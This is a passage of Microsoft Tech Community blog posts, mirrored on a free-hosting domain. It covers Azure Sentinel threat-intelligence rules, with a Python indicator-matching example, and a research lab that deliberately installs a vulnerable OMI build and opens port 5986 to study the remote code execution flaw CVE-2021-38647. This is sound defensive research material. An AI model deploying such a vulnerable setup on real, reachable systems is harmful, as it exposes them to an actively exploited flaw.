/></span></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><SPAN class="TextRun SCXW116016312 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW116016312 BCX0">To learn more about how to create, tag</SPAN></SPAN><SPAN class="TrackChangeTextInsertion TrackedChange SCXW116016312 BCX0"><SPAN class="TextRun SCXW116016312 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW116016312 BCX0">,</SPAN></SPAN></SPAN><SPAN class="TextRun SCXW116016312 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW116016312 BCX0"><SPAN>&nbsp;</SPAN>and filter indicators</SPAN><SPAN class="NormalTextRun SCXW116016312 BCX0"><SPAN>&nbsp;</SPAN>refer to the</SPAN><SPAN class="NormalTextRun SCXW116016312 BCX0"><SPAN>&nbsp;</SPAN></SPAN><SPAN class="NormalTextRun SCXW116016312 BCX0">documentation<SPAN>&nbsp;<A href="#" target="_self">here</A>.&nbsp;</SPAN></SPAN></SPAN><SPAN class="EOP SCXW116016312 BCX0" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="5"><STRONG><SPAN class="TextRun SCXW43525759 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW43525759 BCX0">Put threat intelligence to use with out-of-the-box analytic rules</SPAN></SPAN><SPAN class="EOP SCXW43525759 BCX0" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></STRONG></FONT></P> <P><FONT size="4"><SPAN data-contrast="auto">Now that threat intelligence data has been imported into Azure Sentinel,&nbsp;it can be used to&nbsp;power analytics to match it against log data which will generate actionable alerts and incidents.&nbsp;SOC analysts can then use these incidents to take actions and prevent organizations&nbsp;against threats.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><SPAN data-contrast="auto">Customized analytics rules can be 
created, or Azure Sentinel offers&nbsp;26 out-of-the-box analytic rules that match threat indicators imported into or created in Azure Sentinel against log data. The out-of-the-box rules are scheduled, KQL-based rules whose names begin with&nbsp;</SPAN><STRONG><SPAN data-contrast="auto">“TI&nbsp;map”.&nbsp;</SPAN></STRONG><SPAN data-contrast="auto">One&nbsp;such example&nbsp;is “TI map IP entity to&nbsp;OfficeActivity”, which matches all IP indicators imported into Azure Sentinel against the client IP addresses recorded in Office Activity logs.&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 6.JPG" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294157iD86EF20B57EC3003/image-size/large?v=v2&amp;px=999" role="button" title="Image 6.JPG" alt="Image 6.JPG" /></span></FONT></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><FONT size="4"><SPAN data-contrast="none">To learn how to enable and create analytic rules, follow the steps mentioned in this&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">documentation</SPAN></A><SPAN data-contrast="none">.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="5"><STRONG>Get insights into threat intelligence with Workbooks</STRONG></FONT></P> <P><FONT size="4">Azure Sentinel Workbooks are visual charts to obtain insights into data. 
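</FONT></P> <P><FONT size="4">Before moving on to workbooks, the following Python script mirrors the matching logic of the “TI map IP entity to OfficeActivity” style rule described above, run over a few constructed rows. It is an added example for this post, not the KQL rule that ships with Azure Sentinel: the column names follow the ThreatIntelligenceIndicator and OfficeActivity tables, the sample indicators and Office Activity rows are made up, and the 14-day indicator look-back, the 1-hour event look-back, and the choice to keep the latest record per IndicatorId before applying the Active filter (so a later revocation supersedes the earlier record) are assumptions to compare against the rule you actually deploy.</FONT></P>

```python
"""Python mirror of a "TI map IP entity to OfficeActivity" match over constructed rows.
Added example for this post, not the KQL rule that ships with Azure Sentinel; column
names follow the ThreatIntelligenceIndicator and OfficeActivity tables, the sample rows
and the look-back windows are assumptions."""
from datetime import datetime, timedelta, timezone
from ipaddress import ip_address

# Constructed sample indicators (the post includes no real feed data).
INDICATORS = [
    {"IndicatorId": "ioc-1", "TimeGenerated": "2021-09-27T10:00:00Z",
     "ExpirationDateTime": "2021-12-31T00:00:00Z", "Active": True,
     "NetworkIP": "203.0.113.5", "ConfidenceScore": 80, "Description": "C2 node"},
    # ioc-2 was ingested twice; the later record revokes it (Active = False).
    {"IndicatorId": "ioc-2", "TimeGenerated": "2021-09-20T10:00:00Z",
     "ExpirationDateTime": "2021-12-31T00:00:00Z", "Active": True,
     "NetworkIP": "198.51.100.7", "ConfidenceScore": 50, "Description": "scanner"},
    {"IndicatorId": "ioc-2", "TimeGenerated": "2021-09-26T10:00:00Z",
     "ExpirationDateTime": "2021-12-31T00:00:00Z", "Active": False,
     "NetworkIP": "198.51.100.7", "ConfidenceScore": 50, "Description": "scanner"},
    # ioc-3 has already expired and must not match.
    {"IndicatorId": "ioc-3", "TimeGenerated": "2021-09-27T10:00:00Z",
     "ExpirationDateTime": "2021-09-27T11:00:00Z", "Active": True,
     "NetworkIP": "192.0.2.9", "ConfidenceScore": 90, "Description": "phishing host"},
]

# Constructed OfficeActivity rows; ClientIP often carries a port or an IPv4-mapped form.
OFFICE_ACTIVITY = [
    {"TimeGenerated": "2021-09-27T11:40:00Z", "UserId": "alice@contoso.com",
     "Operation": "UserLoggedIn", "ClientIP": "203.0.113.5:51234"},
    {"TimeGenerated": "2021-09-27T11:45:00Z", "UserId": "bob@contoso.com",
     "Operation": "FileDownloaded", "ClientIP": "198.51.100.7"},
    {"TimeGenerated": "2021-09-27T11:50:00Z", "UserId": "carol@contoso.com",
     "Operation": "UserLoggedIn", "ClientIP": "192.0.2.9"},
    {"TimeGenerated": "2021-09-27T11:55:00Z", "UserId": "erin@contoso.com",
     "Operation": "MailItemsAccessed", "ClientIP": "::ffff:203.0.113.5"},
    # Outside the one-hour event window even though the IP is listed.
    {"TimeGenerated": "2021-09-27T08:00:00Z", "UserId": "dave@contoso.com",
     "Operation": "UserLoggedIn", "ClientIP": "203.0.113.5"},
]


def parse_ts(value):
    """ISO-8601 UTC timestamp as written in these rows -> aware datetime."""
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def normalize_client_ip(raw):
    """Reduce '1.2.3.4:51234', '[2001:db8::1]:443' or '::ffff:1.2.3.4' to a bare
    address comparable with NetworkIP; None if the value is not an IP at all."""
    raw = raw.strip()
    try:
        if raw.startswith("["):          # bracketed IPv6 with port
            raw = raw[1:raw.index("]")]
        elif raw.count(":") == 1:        # IPv4 with port
            raw = raw.split(":")[0]
        addr = ip_address(raw)
    except ValueError:
        return None
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped         # IPv4-mapped IPv6 -> plain IPv4
    return str(addr)


def active_indicators(indicators, now, ioc_lookback=timedelta(days=14)):
    """Indicator side of the rule: within the look-back, keep the latest record per
    IndicatorId (the KQL arg_max step), then only Active and unexpired ones.
    Returns a dict keyed by NetworkIP."""
    latest = {}
    for ind in indicators:
        ts = parse_ts(ind["TimeGenerated"])
        if ts < now - ioc_lookback:
            continue
        prev = latest.get(ind["IndicatorId"])
        if prev is None or ts > parse_ts(prev["TimeGenerated"]):
            latest[ind["IndicatorId"]] = ind
    return {ind["NetworkIP"]: ind for ind in latest.values()
            if ind["Active"] and parse_ts(ind["ExpirationDateTime"]) > now}


def ti_map_ip_to_office_activity(indicators, events, now, dt_lookback=timedelta(hours=1)):
    """Event side of the rule: OfficeActivity rows inside the event look-back joined
    to active indicators on the normalized client IP. Returns one match per hit."""
    by_ip = active_indicators(indicators, now)
    matches = []
    for ev in events:
        if parse_ts(ev["TimeGenerated"]) < now - dt_lookback:
            continue
        ip = normalize_client_ip(ev["ClientIP"])
        ind = by_ip.get(ip)
        if ind is None:
            continue
        matches.append({"IndicatorId": ind["IndicatorId"], "Description": ind["Description"],
                        "ConfidenceScore": ind["ConfidenceScore"], "TI_ipEntity": ip,
                        "UserId": ev["UserId"], "Operation": ev["Operation"],
                        "OfficeActivity_TimeGenerated": ev["TimeGenerated"]})
    return matches


if __name__ == "__main__":
    now = parse_ts("2021-09-27T12:00:00Z")   # fixed clock so the sample is reproducible
    for hit in ti_map_ip_to_office_activity(INDICATORS, OFFICE_ACTIVITY, now):
        print(hit)
```

<P><FONT size="4">Two details carry over directly to the KQL rule. OfficeActivity frequently records the client address with a port (“203.0.113.5:51234”) or as an IPv4-mapped IPv6 address, so a plain equality join against NetworkIP misses hits unless the address is normalized first. And a revoked or expired indicator must drop out of the join: in the sample above only the first indicator survives, so two of the five Office Activity rows match and the old revoked scanner entry and the expired phishing host produce nothing. The example keys on NetworkIP only; the indicator table also carries other IP columns (EmailSourceIpAddress, NetworkSourceIP, NetworkDestinationIP) that a production rule would coalesce into the same entity.</FONT></P> <P><FONT size="4">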
Azure Sentinel offers an out-of-the-box workbook called the “Threat Intelligence” workbook for insights into threat intelligence data. This workbook is completely customizable and offers charts that show the incidents generated from threat intelligence data and the uniqueness of each feed brought into Azure Sentinel, irrespective of the source.&nbsp;</FONT></P> <P>&nbsp;</P> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 12.JPG" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294163iAA4B1C7FA92F5213/image-size/large?v=v2&amp;px=999" role="button" title="Image 12.JPG" alt="Image 12.JPG" /></span></FONT></P> <P><FONT size="4"><SPAN class="TextRun SCXW41710278 BCX0" data-contrast="none"><SPAN class="NormalTextRun SCXW41710278 BCX0">Workbooks are interactive charts that give insights into threat intelligence data, such as the feed uniqueness of TI providers, which is important for analyzing and understanding the value of paid feeds.</SPAN></SPAN><SPAN class="EOP SCXW41710278 BCX0" data-ccp-props="{&quot;134233117&quot;:true,&quot;134233118&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:240}">&nbsp;This is a newly added chart in the Threat Intelligence workbook.</SPAN></FONT></P> <P>&nbsp;</P> <P><FONT size="5"><STRONG>Conclusion</STRONG></FONT></P> <P><FONT size="4"><SPAN class="TextRun SCXW99129740 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW99129740 BCX0">With this release of Azure Sentinel threat intelligence to General Availability, customers now have a full suite of TI capabilities in Azure Sentinel to advance the SOC TI program and fully utilize the power of TI within the SIEM.</SPAN><SPAN class="NormalTextRun SCXW99129740 BCX0"><SPAN>&nbsp;</SPAN>Over the next couple of months, more 
threat intelligence enhancements will be released in Azure Sentinel.</SPAN></SPAN><STRONG><SPAN class="TextRun SCXW99129740 BCX0" data-contrast="auto"><SPAN class="NormalTextRun SCXW99129740 BCX0">The major advantage of threat intelligence being in General Availability is that it can be used across clouds, including the Azure public cloud and Azure Government.</SPAN></SPAN><SPAN class="EOP SCXW99129740 BCX0" data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></STRONG></FONT></P> <P>&nbsp;</P> Mon, 27 Sep 2021 20:49:27 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/general-availability-of-azure-sentinel-threat-intelligence-in/ba-p/2525227 RijutaKapoor 2021-09-27T20:49:27Z Azure Sentinel To-Go! 
A Linux 🐧 Lab with AUOMS Set Up to Learn About the OMI Vulnerability 💥 https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/azure-sentinel-to-go-a-linux-lab-with-auoms-set-up-to-learn/ba-p/2772581 <P><SPAN data-contrast="auto"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="main_image.PNG" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311962i65FABA402DA450D7/image-size/large?v=v2&amp;px=999" role="button" title="main_image.PNG" alt="main_image.PNG" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">Last week, on September 14</SPAN><SPAN data-contrast="auto">th</SPAN><SPAN data-contrast="auto">, 2021, Microsoft released fixes for three Elevation of Privilege (EoP) vulnerabilities</SPAN><SPAN data-contrast="none">&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">CVE-2021-38645</SPAN></A><SPAN data-contrast="none">,&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">CVE-2021-38649</SPAN></A><SPAN data-contrast="none">,&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">CVE-2021-38648</SPAN></A><SPAN data-contrast="none">,&nbsp;</SPAN><SPAN data-contrast="auto">and one unauthenticated Remote Code Execution (RCE) vulnerability&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">CVE-2021-38647</SPAN></A><SPAN data-contrast="auto">.&nbsp;</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="none">These vulnerabilities affect the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Open Management Infrastructure (OMI)</SPAN></A><SPAN data-contrast="none">,&nbsp;an open-source project&nbsp;to further the development of a production quality implementation of the DMTF CIM/WBEM standards. 
The OMI&nbsp;Common Information Model Object Manager (CIMOM)&nbsp;is also designed to be portable and highly modular. It is written in C and the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">code is available in GitHub</SPAN></A><SPAN data-contrast="none">.</SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Great Resources to Read First</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="none">The following resources have&nbsp;already been&nbsp;shared by Microsoft to provide&nbsp;guidance&nbsp;on&nbsp;updating&nbsp;vulnerable extensions for Cloud and On-Premises deployments,&nbsp;and indicators to detect the exploitation of the vulnerability:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">MSRC:&nbsp;Additional Guidance Regarding OMI Vulnerabilities within Azure VM Management Extensions</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="1" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="https://gorovian.000webhostapp.com/?exam=t5/blogs/blogworkflowpage/blog-id/AzureSentinelBlog/article-id/1697" target="_blank" rel="noopener"><SPAN data-contrast="none">MSTIC: Hunting for OMI Vulnerability Exploitation with Azure Sentinel</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" 
data-listid="1" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-security-center/using-asc-to-find-machines-affected-by-omi-vulnerabilities-in/ba-p/2767240" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Security Center: Using ASC to find machines affected by OMI vulnerabilities in Azure VM Management Extensions</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">What is this about?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">In this post, I&nbsp;will show&nbsp;you how to&nbsp;automatically&nbsp;deploy&nbsp;a&nbsp;research&nbsp;lab environment with&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel</SPAN></A><SPAN data-contrast="auto">&nbsp;, a few&nbsp;Linux&nbsp;virtual machines&nbsp;and&nbsp;the&nbsp;Microsoft Audit Collection Tool (AUOMS)&nbsp;set up&nbsp;to understand&nbsp;the underlying behavior of the exploitation of the OMI vulnerability.</SPAN></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">This is an extension of the amazing work shared&nbsp;by MSTIC&nbsp;through&nbsp;the following resources:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Kevin Sheldrake</SPAN></A><SPAN data-contrast="auto">&nbsp;-&nbsp;</SPAN><A 
href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/hunting-threats-on-linux-with-azure-sentinel/ba-p/1344431" target="_blank" rel="noopener"><SPAN data-contrast="none">Hunting Threats on Linux with Azure Sentinel</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="2" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Jannie Li</SPAN></A><SPAN data-contrast="auto">&nbsp;-&nbsp;</SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/guided-hunting-notebook-base64-encoded-linux-commands/ba-p/1579484" target="_blank" rel="noopener"><SPAN data-contrast="none">Guided Hunting Notebook: Base64-Encoded Linux Commands</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> <P>&nbsp;</P> <P><STRONG><SPAN class="NormalTextRun BCX8 SCXW145370746">Before going through a few concepts and the deployment process, r</SPAN><SPAN class="NormalTextRun BCX8 SCXW145370746">emember that this vulnerability is actively being exploited. 
Therefore, make sure you do not expose your lab environment to the Internet</SPAN><SPAN class="NormalTextRun BCX8 SCXW145370746">.</SPAN></STRONG></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="5"><FONT size="6"><SPAN data-contrast="none">Microsoft Audit Collection Tool (AUOMS)</SPAN></FONT><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">AUOMS is a Microsoft audit collection tool that can collect events generated by the Linux kernel’s audit subsystem,&nbsp;kaudit, and the optional user-space&nbsp;daemon,&nbsp;auditd.&nbsp;This allows, for example, the collection of syscall events such as process creations, file access, and other valuable telemetry for research.</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">AUOMS is part of the&nbsp;installation of the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Log Analytics Agent</SPAN></A>&nbsp;for Linux,<SPAN data-contrast="auto">&nbsp;also known as the&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Operations Management Suite (OMS) Agent for Linux</SPAN></A><SPAN data-contrast="auto">,&nbsp;which allows the streaming of events from Linux-based, syslog-supporting devices into Azure Sentinel.&nbsp;However, AUOMS is not enabled by default, as shown below:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="auoms_not_enabled.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/311930iFBE6875E18F4C807/image-size/large?v=v2&amp;px=999" role="button" 
title="auoms_not_enabled.png" alt="auoms_not_enabled.png" /></span></SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">My colleague Kevin Sheldrake&nbsp;documented&nbsp;everything that is required to set it up&nbsp;in&nbsp;this blog post&nbsp;</SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/hunting-threats-on-linux-with-azure-sentinel/ba-p/1344431" target="_blank" rel="noopener"><SPAN data-contrast="none">Hunting Threats on Linux with Azure Sentinel</SPAN></A><SPAN data-contrast="auto">.</SPAN></P> <P>&nbsp;</P> <H4><FONT size="4"><SPAN data-contrast="auto">The question is “</SPAN><STRONG><SPAN data-contrast="auto">How do we automate the whole setup?</SPAN></STRONG><SPAN data-contrast="auto">”</SPAN></FONT></H4> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Enter Azure Sentinel To-go!</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">Azure Sentinel2Go is an&nbsp;open-source&nbsp;project developed to expedite the deployment of an Azure Sentinel lab along with other Azure resources and a data ingestion pipeline to consume pre-recorded datasets for research purposes.</SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Azure Sentinel +&nbsp;Linux Environment</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">Currently, we have&nbsp;a Linux environment ready to go and deploy&nbsp;everything needed for a&nbsp;small&nbsp;research lab with AUOMS configured&nbsp;and sending logs to Azure Sentinel:</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel2Go/grocery-list/Linux at master · OTRF/Azure-Sentinel2Go (github.com)</SPAN></A><SPAN 
data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><SPAN data-contrast="auto">We were able to use <A href="#" target="_self">Azure Resource Manager (ARM)</A> templates and a few bash scripts to automate the whole setup. These are all the resources used for each component of the lab:</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><SPAN data-contrast="auto">Azure Sentinel</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure Sentinel&nbsp;instance</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Syslog&nbsp;data connector</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="1" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Syslog data collection from specific facilities</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> </LI> </UL> <UL> <LI data-leveltext="" 
data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><SPAN data-contrast="auto">Linux Virtual Machines</SPAN><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Linux virtual machines</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">OMS Agent for Linux installer</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">OMS&nbsp;Auditd&nbsp;Plugin setup</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN> <UL> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">AUOMS Syslog config</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> <LI data-leveltext="" data-font="Symbol" data-listid="3" aria-setsize="-1" data-aria-posinset="2" data-aria-level="1"><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">AUOMS 
rules</SPAN></A><SPAN data-ccp-props="{&quot;134233279&quot;:true,&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></LI> </UL> </LI> </UL> </LI> </UL> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">What about the OMI Vulnerability?</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559738&quot;:240,&quot;335559739&quot;:0,&quot;335559740&quot;:259}">&nbsp;</SPAN></FONT></H2> <P><SPAN data-contrast="auto">As we know,&nbsp;</SPAN><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">older versions of&nbsp;the OMI agent</SPAN></A><SPAN data-contrast="auto">&nbsp;(&lt;&nbsp;1.6.8.1) are vulnerable. Therefore, we created the following script to install <A href="#" target="_self">version 1.6.8.0</A>, a vulnerable build, and open port 5986, the OMI HTTPS remote management port through which the unauthenticated RCE (CVE-2021-38647) is reached.</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Blacksmith/Install-OMI.sh at master · OTRF/Blacksmith (github.com)</SPAN></A></P> <P><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P><SPAN data-contrast="auto">We added that script to the Linux lab templates, and we now have a demo environment that you can also use to learn more about the exploitation of the OMI vulnerability.</SPAN><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN data-contrast="none">Azure-Sentinel2Go/grocery-list/Linux/demos/CVE-2021-38647-OMI at master · OTRF/Azure-Sentinel2Go (github.com)</SPAN></A><SPAN data-ccp-props="{&quot;201341983&quot;:0,&quot;335559739&quot;:160,&quot;335559740&quot;:259}">&nbsp;</SPAN></P> <P>&nbsp;</P> <H2 aria-level="1"><FONT size="6"><SPAN data-contrast="none">Deploying&nbsp;the Lab Environment</SPAN><SPAN 
